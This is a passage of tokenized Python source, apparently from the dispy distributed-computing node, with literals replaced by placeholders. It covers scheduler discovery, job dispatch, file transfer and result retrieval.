secret , info [ '<STR_LIT>' ] ) } <EOL> if psutil : <EOL> pong_msg [ '<STR_LIT>' ] = DispyNodeAvailInfo ( <EOL> <NUM_LIT> - psutil . cpu_percent ( ) , psutil . virtual_memory ( ) . available , <EOL> psutil . disk_usage ( self . dest_path_prefix ) . free , <EOL> <NUM_LIT> - psutil . swap_memory ( ) . percent ) <EOL> else : <EOL> pong_msg [ '<STR_LIT>' ] = None <EOL> for scheduler_ip_addr in scheduler_ip_addrs : <EOL> addr = ( scheduler_ip_addr , scheduler_port ) <EOL> pong_msg [ '<STR_LIT>' ] = scheduler_ip_addr <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( addr ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( pong_msg ) ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] , addr [ <NUM_LIT:1> ] ) <EOL> finally : <EOL> sock . close ( ) <EOL> else : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> ping_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign , <EOL> '<STR_LIT:version>' : _dispy_version } <EOL> for scheduler_ip_addr in scheduler_ip_addrs : <EOL> addr = ( scheduler_ip_addr , scheduler_port ) <EOL> ping_msg [ '<STR_LIT>' ] = scheduler_ip_addr <EOL> try : <EOL> yield sock . sendto ( '<STR_LIT>' . encode ( ) + serialize ( ping_msg ) , addr ) <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> pass <EOL> sock . close ( ) <EOL> def udp_server ( self , scheduler_ip , scheduler_port , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> yield self . broadcast_ping_msg ( coro = coro ) <EOL> ping_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . 
sign , <EOL> '<STR_LIT:version>' : _dispy_version } <EOL> def send_ping_msg ( self , info , coro = None ) : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> addr = ( info [ '<STR_LIT>' ] , info [ '<STR_LIT:port>' ] ) <EOL> info . update ( ping_msg ) <EOL> info [ '<STR_LIT>' ] = addr [ <NUM_LIT:0> ] <EOL> try : <EOL> yield sock . sendto ( '<STR_LIT>' . encode ( ) + serialize ( info ) , addr ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( addr ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> if scheduler_ip : <EOL> Coro ( send_ping_msg , self , { '<STR_LIT>' : scheduler_ip , '<STR_LIT:port>' : scheduler_port } ) <EOL> while True : <EOL> msg , addr = yield self . udp_sock . recvfrom ( <NUM_LIT:1000> ) <EOL> if msg . startswith ( b'<STR_LIT>' ) : <EOL> try : <EOL> info = unserialize ( msg [ len ( b'<STR_LIT>' ) : ] ) <EOL> if info [ '<STR_LIT:version>' ] != _dispy_version : <EOL> _dispy_logger . warning ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> continue <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] , addr [ <NUM_LIT:1> ] ) <EOL> continue <EOL> Coro ( self . send_pong_msg , info , addr ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> try : <EOL> info = unserialize ( msg [ len ( b'<STR_LIT>' ) : ] ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> else : <EOL> if info [ '<STR_LIT>' ] == self . scheduler [ '<STR_LIT>' ] : <EOL> now = time . time ( ) <EOL> for compute in self . computations . values ( ) : <EOL> compute . 
last_pulse = now <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> def tcp_server ( self ) : <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> conn , addr = yield self . tcp_sock . accept ( ) <EOL> except GeneratorExit : <EOL> break <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> continue <EOL> Coro ( self . tcp_serve_task , conn , addr ) <EOL> def tcp_serve_task ( self , conn , addr , coro = None ) : <EOL> def job_request_task ( msg ) : <EOL> try : <EOL> _job = unserialize ( msg ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> raise StopIteration <EOL> compute = self . computations . get ( _job . compute_id , None ) <EOL> if compute is not None : <EOL> if compute . scheduler_ip_addr != self . scheduler [ '<STR_LIT>' ] or compute . scheduler_port != self . scheduler [ '<STR_LIT:port>' ] or compute . auth not in self . scheduler [ '<STR_LIT>' ] : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . scheduler_ip_addr , compute . scheduler_port , <EOL> self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) <EOL> compute = None <EOL> if self . avail_cpus == <NUM_LIT:0> : <EOL> try : <EOL> yield conn . send_msg ( '<STR_LIT>' . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> elif compute is None : <EOL> _dispy_logger . warning ( '<STR_LIT>' , _job . compute_id ) <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> _job . compute_id ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> for xf in _job . xfer_files : <EOL> if MaxFileSize and xf . stat_buf . st_size > MaxFileSize : <EOL> try : <EOL> yield conn . send_msg ( '<STR_LIT>' . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> reply_addr = ( compute . scheduler_ip_addr , compute . job_result_port ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> _job . uid , addr [ <NUM_LIT:0> ] , compute . 
scheduler_ip_addr ) <EOL> if compute . type == _Compute . func_type : <EOL> reply = _JobReply ( _job , self . ext_ip_addr ) <EOL> reply . start_time = time . time ( ) <EOL> job_info = _DispyJobInfo ( reply , reply_addr , compute , _job . xfer_files ) <EOL> args = ( job_info , self . certfile , self . keyfile , compute . name , <EOL> _job . args , _job . kwargs , ( compute . code , _job . code ) , <EOL> compute . globals , compute . dest_path , self . reply_Q ) <EOL> try : <EOL> yield conn . send_msg ( b'<STR_LIT>' ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> raise StopIteration <EOL> proc = multiprocessing . Process ( target = _dispy_job_func , args = args ) <EOL> self . avail_cpus -= <NUM_LIT:1> <EOL> compute . pending_jobs += <NUM_LIT:1> <EOL> self . thread_lock . acquire ( ) <EOL> self . job_infos [ _job . uid ] = job_info <EOL> self . thread_lock . release ( ) <EOL> try : <EOL> proc . start ( ) <EOL> except : <EOL> job_info . job_reply . status = DispyJob . Terminated <EOL> job_info . job_reply . exception = traceback . format_exc ( ) <EOL> job_info . job_reply . end_time = time . time ( ) <EOL> job_info . proc = None <EOL> self . reply_Q . put ( job_info . job_reply ) <EOL> else : <EOL> job_info . proc = proc <EOL> job_info . job_reply . status = DispyJob . Running <EOL> raise StopIteration <EOL> elif compute . type == _Compute . prog_type : <EOL> try : <EOL> yield conn . send_msg ( b'<STR_LIT>' ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> raise StopIteration <EOL> reply = _JobReply ( _job , self . ext_ip_addr ) <EOL> reply . start_time = time . time ( ) <EOL> job_info = _DispyJobInfo ( reply , reply_addr , compute , _job . xfer_files ) <EOL> job_info . job_reply . status = DispyJob . Running <EOL> self . thread_lock . acquire ( ) <EOL> self . job_infos [ _job . uid ] = job_info <EOL> self . thread_lock . release ( ) <EOL> self . avail_cpus -= <NUM_LIT:1> <EOL> compute . 
pending_jobs += <NUM_LIT:1> <EOL> prog_thread = threading . Thread ( target = self . __job_program , args = ( _job , job_info ) ) <EOL> prog_thread . start ( ) <EOL> raise StopIteration <EOL> else : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> compute . type ) . encode ( ) ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> def add_computation_task ( msg ) : <EOL> try : <EOL> compute = unserialize ( msg ) <EOL> except : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> if not ( ( self . scheduler [ '<STR_LIT>' ] is None and not self . scheduler [ '<STR_LIT>' ] ) or <EOL> ( self . scheduler [ '<STR_LIT>' ] == compute . scheduler_ip_addr and <EOL> self . scheduler [ '<STR_LIT:port>' ] == compute . scheduler_port and <EOL> self . service_available ( ) ) ) : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . scheduler_ip_addr , self . scheduler [ '<STR_LIT>' ] , <EOL> self . avail_cpus , self . num_cpus ) <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> if MaxFileSize : <EOL> for xf in compute . xfer_files : <EOL> if xf . stat_buf . st_size > MaxFileSize : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> ( xf . name , MaxFileSize ) ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> compute . xfer_files = set ( ) <EOL> dest = os . path . join ( self . dest_path_prefix , compute . scheduler_ip_addr ) <EOL> if not os . path . isdir ( dest ) : <EOL> try : <EOL> os . mkdir ( dest ) <EOL> except : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> raise StopIteration <EOL> if compute . dest_path and isinstance ( compute . dest_path , str ) : <EOL> if not compute . dest_path . startswith ( os . sep ) : <EOL> compute . dest_path = os . path . join ( dest , compute . dest_path ) <EOL> if not os . path . 
isdir ( compute . dest_path ) : <EOL> try : <EOL> os . makedirs ( compute . dest_path ) <EOL> except : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> else : <EOL> compute . dest_path = tempfile . mkdtemp ( prefix = compute . name + '<STR_LIT:_>' , dir = dest ) <EOL> os . chmod ( compute . dest_path , stat . S_IRUSR | stat . S_IWUSR | stat . S_IXUSR ) <EOL> if compute . id in self . computations : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> compute . name , compute . id ) <EOL> setattr ( compute , '<STR_LIT>' , time . time ( ) ) <EOL> setattr ( compute , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> setattr ( compute , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> setattr ( compute , '<STR_LIT>' , False ) <EOL> setattr ( compute , '<STR_LIT>' , { } ) <EOL> setattr ( compute , '<STR_LIT>' , set ( sys . modules . keys ( ) ) ) <EOL> setattr ( compute , '<STR_LIT>' , { } ) <EOL> if compute . code : <EOL> try : <EOL> code = compute . code <EOL> code += self . __init_code <EOL> code = compile ( code , '<STR_LIT>' , '<STR_LIT>' ) <EOL> except : <EOL> if os . path . isdir ( compute . dest_path ) : <EOL> os . rmdir ( compute . dest_path ) <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> ( self . ext_ip_addr , compute . name ) ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> compute . code = marshal . dumps ( code ) <EOL> if compute . type == _Compute . prog_type : <EOL> compute . name = os . path . join ( compute . dest_path , os . path . basename ( compute . name ) ) <EOL> if not ( ( self . scheduler [ '<STR_LIT>' ] is None ) or <EOL> ( self . scheduler [ '<STR_LIT>' ] == compute . scheduler_ip_addr and <EOL> self . scheduler [ '<STR_LIT:port>' ] == compute . scheduler_port ) ) : <EOL> if os . path . isdir ( compute . dest_path ) : <EOL> try : <EOL> os . rmdir ( compute . dest_path ) <EOL> yield conn . 
send_msg ( serialize ( - <NUM_LIT:1> ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> self . computations [ compute . id ] = compute <EOL> self . scheduler [ '<STR_LIT>' ] = compute . scheduler_ip_addr <EOL> self . scheduler [ '<STR_LIT:port>' ] = compute . scheduler_port <EOL> self . scheduler [ '<STR_LIT>' ] . add ( compute . auth ) <EOL> compute_save = os . path . join ( self . dest_path_prefix , '<STR_LIT>' % ( compute . id , compute . auth ) ) <EOL> fd = open ( compute_save , '<STR_LIT:wb>' ) <EOL> pickle . dump ( compute , fd ) <EOL> fd . close ( ) <EOL> if os . name == '<STR_LIT>' : <EOL> compute . globals = { } <EOL> else : <EOL> for var in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) : <EOL> compute . globals [ var ] = globals ( ) [ var ] <EOL> compute . globals . update ( self . __init_modules ) <EOL> compute . globals [ '<STR_LIT>' ] = None <EOL> try : <EOL> yield conn . send_msg ( serialize ( self . avail_cpus ) ) <EOL> except : <EOL> del self . computations [ compute . id ] <EOL> compute . globals = { } <EOL> self . scheduler [ '<STR_LIT>' ] = None <EOL> self . scheduler [ '<STR_LIT>' ] . discard ( compute . auth ) <EOL> os . remove ( compute_save ) <EOL> if os . path . isdir ( compute . dest_path ) : <EOL> try : <EOL> os . rmdir ( compute . dest_path ) <EOL> except : <EOL> pass <EOL> else : <EOL> self . pulse_interval = num_min ( self . pulse_interval , compute . pulse_interval ) <EOL> if not self . pulse_interval : <EOL> self . pulse_interval = <NUM_LIT:10> * <NUM_LIT> <EOL> if self . zombie_interval : <EOL> self . pulse_interval = num_min ( self . pulse_interval , self . zombie_interval / <NUM_LIT> ) <EOL> self . timer_coro . resume ( True ) <EOL> def xfer_file_task ( msg ) : <EOL> try : <EOL> xf = unserialize ( msg ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> raise StopIteration <EOL> compute = self . computations . get ( xf . 
compute_id , None ) <EOL> if not compute or ( MaxFileSize and xf . stat_buf . st_size > MaxFileSize ) : <EOL> _dispy_logger . error ( '<STR_LIT>' , xf . name ) <EOL> yield conn . send_msg ( serialize ( - <NUM_LIT:1> ) ) <EOL> raise StopIteration <EOL> tgt = os . path . join ( compute . dest_path , os . path . basename ( xf . name ) ) <EOL> if os . path . isfile ( tgt ) and _same_file ( tgt , xf ) : <EOL> if tgt in compute . file_uses : <EOL> compute . file_uses [ tgt ] += <NUM_LIT:1> <EOL> else : <EOL> compute . file_uses [ tgt ] = <NUM_LIT:2> <EOL> yield conn . send_msg ( serialize ( xf . stat_buf . st_size ) ) <EOL> else : <EOL> try : <EOL> fd = open ( tgt , '<STR_LIT:wb>' ) <EOL> recvd = <NUM_LIT:0> <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> xf . name , tgt , xf . stat_buf . st_size ) <EOL> while recvd < xf . stat_buf . st_size : <EOL> yield conn . send_msg ( serialize ( recvd ) ) <EOL> data = yield conn . recvall ( min ( xf . stat_buf . st_size - recvd , <NUM_LIT> ) ) <EOL> if not data : <EOL> break <EOL> fd . write ( data ) <EOL> recvd += len ( data ) <EOL> yield conn . send_msg ( serialize ( recvd ) ) <EOL> fd . close ( ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> tgt , recvd , xf . stat_buf . st_size ) <EOL> assert recvd == xf . stat_buf . st_size <EOL> os . utime ( tgt , ( xf . stat_buf . st_atime , xf . stat_buf . st_mtime ) ) <EOL> os . chmod ( tgt , stat . S_IMODE ( xf . stat_buf . st_mode ) ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> xf . name , traceback . format_exc ( ) ) <EOL> os . remove ( tgt ) <EOL> else : <EOL> if tgt in compute . file_uses : <EOL> compute . file_uses [ tgt ] += <NUM_LIT:1> <EOL> else : <EOL> compute . file_uses [ tgt ] = <NUM_LIT:1> <EOL> raise StopIteration <EOL> def setup_computation ( msg ) : <EOL> try : <EOL> compute_id = unserialize ( msg ) <EOL> compute = self . computations [ compute_id ] <EOL> assert isinstance ( compute . setup , _Function ) <EOL> os . chdir ( compute . 
dest_path ) <EOL> localvars = { '<STR_LIT>' : compute . setup . args , <EOL> '<STR_LIT>' : compute . setup . kwargs } <EOL> if os . name == '<STR_LIT>' : <EOL> globalvars = globals ( ) <EOL> else : <EOL> globalvars = compute . globals <EOL> exec ( marshal . loads ( compute . code ) , globalvars , localvars ) <EOL> exec ( '<STR_LIT>' % <EOL> compute . setup . name , globalvars , localvars ) <EOL> if os . name == '<STR_LIT>' : <EOL> compute . globals . update ( { var : globals ( ) [ var ] for var in globals ( ) <EOL> if var not in self . __init_globals } ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' ) <EOL> resp = traceback . format_exc ( ) . encode ( ) <EOL> else : <EOL> resp = b'<STR_LIT>' <EOL> if resp != b'<STR_LIT>' : <EOL> if not compute . cleanup : <EOL> compute . cleanup = True <EOL> compute . zombie = True <EOL> self . cleanup_computation ( compute ) <EOL> yield conn . send_msg ( resp ) <EOL> def terminate_job_task ( compute , job_info ) : <EOL> if not job_info . proc : <EOL> raise StopIteration <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> job_info . job_reply . uid , compute . name ) <EOL> job_info . proc . terminate ( ) <EOL> if isinstance ( job_info . proc , multiprocessing . Process ) : <EOL> for x in range ( <NUM_LIT:20> ) : <EOL> if job_info . proc . is_alive ( ) : <EOL> yield coro . sleep ( <NUM_LIT:0.1> ) <EOL> else : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . name , job_info . job_reply . uid ) <EOL> break <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> raise StopIteration <EOL> else : <EOL> assert isinstance ( job_info . proc , subprocess . Popen ) <EOL> for x in range ( <NUM_LIT:20> ) : <EOL> rc = job_info . proc . poll ( ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . name , job_info . job_reply . uid , rc ) <EOL> if rc is not None : <EOL> break <EOL> if x == <NUM_LIT:10> : <EOL> _dispy_logger . debug ( '<STR_LIT>' , job_info . job_reply . uid ) <EOL> job_info . 
proc . kill ( ) <EOL> yield coro . sleep ( <NUM_LIT:0.1> ) <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> raise StopIteration <EOL> job_info . job_reply . end_time = time . time ( ) <EOL> job_info . proc = None <EOL> self . thread_lock . acquire ( ) <EOL> if self . job_infos . get ( job_info . job_reply . uid , None ) == job_info : <EOL> job_info . job_reply . status = DispyJob . Terminated <EOL> self . reply_Q . put ( job_info . job_reply ) <EOL> self . thread_lock . release ( ) <EOL> def retrieve_job_task ( msg ) : <EOL> def send_reply ( reply ) : <EOL> try : <EOL> yield conn . send_msg ( serialize ( reply ) ) <EOL> except : <EOL> raise StopIteration ( - <NUM_LIT:1> ) <EOL> raise StopIteration ( <NUM_LIT:0> ) <EOL> try : <EOL> req = unserialize ( msg ) <EOL> uid = req [ '<STR_LIT>' ] <EOL> compute_id = req [ '<STR_LIT>' ] <EOL> auth = req [ '<STR_LIT>' ] <EOL> job_hash = req [ '<STR_LIT>' ] <EOL> except : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> pkl_path = os . path . join ( self . dest_path_prefix , '<STR_LIT>' % ( compute_id , auth ) ) <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if not compute : <EOL> fd = open ( pkl_path , '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> if not compute or compute . auth != auth : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> info_file = os . path . join ( compute . dest_path , '<STR_LIT>' % uid ) <EOL> if not os . path . isfile ( info_file ) : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> try : <EOL> fd = open ( info_file , '<STR_LIT:rb>' ) <EOL> job_reply = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> assert job_reply . hash == job_hash <EOL> except : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> try : <EOL> yield conn . send_msg ( serialize ( job_reply ) ) <EOL> ack = yield conn . recv_msg ( ) <EOL> assert ack == b'<STR_LIT>' <EOL> compute . 
pending_results -= <NUM_LIT:1> <EOL> fd = open ( pkl_path , '<STR_LIT:wb>' ) <EOL> pickle . dump ( compute , fd ) <EOL> fd . close ( ) <EOL> except : <EOL> pass <EOL> else : <EOL> try : <EOL> os . remove ( info_file ) <EOL> except : <EOL> pass <EOL> if compute . pending_results == <NUM_LIT:0> : <EOL> self . cleanup_computation ( compute ) <EOL> try : <EOL> req = yield conn . recvall ( len ( self . auth ) ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' ) <EOL> conn . close ( ) <EOL> raise StopIteration <EOL> msg = yield conn . recv_msg ( ) <EOL> if req != self . auth : <EOL> if msg . startswith ( b'<STR_LIT>' ) : <EOL> pass <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' ) <EOL> conn . close ( ) <EOL> raise StopIteration <EOL> if not msg : <EOL> conn . close ( ) <EOL> raise StopIteration <EOL> if msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield job_request_task ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield add_computation_task ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield xfer_file_task ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield setup_computation ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> try : <EOL> info = unserialize ( msg ) <EOL> compute_id = info [ '<STR_LIT>' ] <EOL> auth = info [ '<STR_LIT>' ] <EOL> terminate_pending = info . get ( '<STR_LIT>' , False ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , traceback . format_exc ( ) ) <EOL> else : <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if compute is None or compute . auth != auth : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute_id ) <EOL> else : <EOL> compute . 
zombie = True <EOL> if terminate_pending : <EOL> self . thread_lock . acquire ( ) <EOL> job_infos = [ job_info for job_info in self . job_infos . values ( ) <EOL> if job_info . compute_id == compute_id ] <EOL> self . thread_lock . release ( ) <EOL> for job_info in job_infos : <EOL> yield terminate_job_task ( compute , job_info ) <EOL> self . cleanup_computation ( compute ) <EOL> yield conn . send_msg ( b'<STR_LIT>' ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> try : <EOL> _job = unserialize ( msg ) <EOL> compute = self . computations [ _job . compute_id ] <EOL> self . thread_lock . acquire ( ) <EOL> job_info = self . job_infos . get ( _job . uid , None ) <EOL> self . thread_lock . release ( ) <EOL> assert job_info is not None <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> addr [ <NUM_LIT:0> ] , compute . scheduler_ip_addr ) <EOL> else : <EOL> yield terminate_job_task ( compute , job_info ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> try : <EOL> info = unserialize ( msg ) <EOL> compute_id = info [ '<STR_LIT>' ] <EOL> auth = info [ '<STR_LIT>' ] <EOL> except : <EOL> reply = <NUM_LIT:0> <EOL> else : <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if compute is None or compute . auth != auth : <EOL> try : <EOL> fd = open ( os . path . join ( self . dest_path_prefix , <EOL> '<STR_LIT>' % ( compute_id , auth ) ) , '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> except : <EOL> pass <EOL> if compute is None : <EOL> reply = <NUM_LIT:0> <EOL> else : <EOL> reply = compute . pending_results + compute . pending_jobs <EOL> yield conn . send_msg ( serialize ( reply ) ) <EOL> conn . close ( ) <EOL> if reply > <NUM_LIT:0> : <EOL> yield self . resend_job_results ( compute , coro = coro ) <EOL> elif msg . 
startswith ( b'<STR_LIT>' ) : <EOL> try : <EOL> info = unserialize ( msg [ len ( b'<STR_LIT>' ) : ] ) <EOL> if ( info [ '<STR_LIT:version>' ] == _dispy_version and <EOL> not self . scheduler [ '<STR_LIT>' ] and not self . job_infos ) : <EOL> Coro ( self . send_pong_msg , info , addr ) <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> reply = { '<STR_LIT>' : [ ] , '<STR_LIT>' : <NUM_LIT:0> } <EOL> try : <EOL> info = unserialize ( msg ) <EOL> compute_id = info [ '<STR_LIT>' ] <EOL> auth = info [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> else : <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if compute is None or compute . auth != auth : <EOL> fd = open ( os . path . join ( self . dest_path_prefix , <EOL> '<STR_LIT>' % ( compute_id , auth ) ) , '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> if compute is not None : <EOL> done = [ ] <EOL> if compute . pending_results : <EOL> for result_file in glob . glob ( os . path . join ( compute . dest_path , <EOL> '<STR_LIT>' ) ) : <EOL> result_file = os . path . basename ( result_file ) <EOL> try : <EOL> uid = int ( result_file [ len ( '<STR_LIT>' ) : ] ) <EOL> except : <EOL> pass <EOL> else : <EOL> done . append ( uid ) <EOL> if len ( done ) > <NUM_LIT:50> : <EOL> break <EOL> reply [ '<STR_LIT>' ] = done <EOL> reply [ '<STR_LIT>' ] = compute . pending_jobs <EOL> yield conn . send_msg ( serialize ( reply ) ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield retrieve_job_task ( msg ) <EOL> conn . close ( ) <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> msg [ : min ( <NUM_LIT:10> , len ( msg ) ) ] , addr [ <NUM_LIT:0> ] ) <EOL> resp = ( '<STR_LIT>' % ( msg [ : min ( <NUM_LIT:10> , len ( msg ) ) ] ) ) . 
encode ( ) <EOL> try : <EOL> yield conn . send_msg ( resp ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> conn . close ( ) <EOL> def resend_job_results ( self , compute , coro = None ) : <EOL> if not os . path . isdir ( compute . dest_path ) : <EOL> raise StopIteration <EOL> result_files = [ f for f in os . listdir ( compute . dest_path ) <EOL> if f . startswith ( '<STR_LIT>' ) ] <EOL> result_files = result_files [ : min ( len ( result_files ) , <NUM_LIT:64> ) ] <EOL> for result_file in result_files : <EOL> result_file = os . path . join ( compute . dest_path , result_file ) <EOL> try : <EOL> fd = open ( result_file , '<STR_LIT:rb>' ) <EOL> job_result = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , result_file ) <EOL> continue <EOL> job_info = _DispyJobInfo ( job_result , ( compute . scheduler_ip_addr , <EOL> compute . job_result_port ) , compute , [ ] ) <EOL> status = yield self . _send_job_reply ( job_info , resending = True ) <EOL> if status : <EOL> break <EOL> def timer_task ( self , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> last_pulse_time = last_zombie_time = time . time ( ) <EOL> while True : <EOL> reset = yield coro . suspend ( self . pulse_interval ) <EOL> if reset : <EOL> continue <EOL> now = time . time ( ) <EOL> if self . pulse_interval and ( now - last_pulse_time ) >= self . pulse_interval : <EOL> if self . scheduler [ '<STR_LIT>' ] : <EOL> last_pulse_time = now <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , <EOL> '<STR_LIT>' : self . num_cpus - self . avail_cpus , <EOL> '<STR_LIT>' : self . scheduler [ '<STR_LIT>' ] } <EOL> if psutil : <EOL> info [ '<STR_LIT>' ] = DispyNodeAvailInfo ( <EOL> <NUM_LIT> - psutil . cpu_percent ( ) , psutil . virtual_memory ( ) . available , <EOL> psutil . 
